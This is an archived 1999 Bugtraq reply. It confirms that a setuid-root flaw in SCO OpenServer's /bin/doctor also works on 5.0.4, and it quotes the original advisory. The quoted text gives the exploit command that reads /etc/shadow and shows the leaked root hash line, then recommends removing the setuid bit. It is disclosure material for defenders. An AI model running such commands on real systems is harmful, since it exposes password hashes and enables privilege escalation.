Bugtraq mailing list archives
Re: SCO 5.0.5 /bin/doctor local root comprimise
From: sarnold () WILLAMETTE EDU (Seth R Arnold)
Date: Wed, 8 Sep 1999 11:31:57 -0700
confirmed to run under 5.0.4 as well. On Fri, Sep 03, 1999 at 05:20:17PM -0500, Brock Tellier wrote:
Greetings, INFO: There is a local root comprimise in SCO 5.0.5's /bin/doctor 2.0.0e2 and probably others. By supplying a doctor script file you can read the first partial line of any file on the system (good enough for /etc/shadow). Example: scobox:/bin$ id uid=136(btellier),200(users) scobox:/bin$ uname -a SCO_SV scobox 3.2 5.0.5 i386 scobox:/bin$ doctor -V doctor 2.0.0e 2 scobox:/bin$ doctor -s /etc/shadow doctor: WARNING User message: invalid command name "root:xbfOLR0ekXN/o:10656::" scobox:/bin$ And so on. FIX: Just chmod -s until SCO comes out with a fix. Although I certianly won't be changing it back to suid root anytime soon. If a hole like this exists, there are undoubtedly countless more lurking within. Brock Tellier Systems Administrator Webley Systems
-- Seth Arnold | http://www.willamette.edu/~sarnold/ Hate spam? See http://maps.vix.com/rbl/ for help Hi! I'm a .signature virus! Copy me into your ~/.signature to help me spread!
Current thread:
- I found this today and iam reporting it to you first!!! (fwd) Alfred Huger (Aug 30)
- <Possible follow-ups>
- Re: I found this today and iam reporting it to you first!!! (fwd) blue0ne (Sep 02)
- Re: I found this today and iam reporting it to you first!!! (fwd) Technical Incursion Countermeasures (Sep 02)
- [SECURITY] TenFour TFS SMTP 3.2 Buffer Overflow Christophe Lesur (Sep 02)
- SCO 5.0.5 /bin/doctor local root comprimise Brock Tellier (Sep 03)
- Re: SCO 5.0.5 /bin/doctor local root comprimise Seth R Arnold (Sep 08)
- Re: I found this today and iam reporting it to you first!!! (fwd) Peter van Dijk (Sep 04)
- Re: I found this today and iam reporting it to you first!!! (fwd) Daniel Dulitz (Sep 04)
- Re: I found this today and iam reporting it to you first!!! (fwd) Bret Watson (Sep 07)
- Re: I found this today and iam reporting it to you first!!! (fwd) Daniel W. Dulitz x108 (Sep 06)
- Re: I found this today and iam reporting it to you first!!! (fwd) Wietse Venema (Sep 04)
- Re: I found this today and iam reporting it to you first!!! (fwd) Alan Brown (Sep 07)
- Re: I found this today and iam reporting it to you first!!! (fwd) Jamie A. Lawrence (Sep 04)
- Re: I found this today and iam reporting it to you first!!! (fwd) Bret Watson (Sep 07)
- Re: I found this today and iam reporting it to you first!!! (fwd) Bill Royds (Sep 07)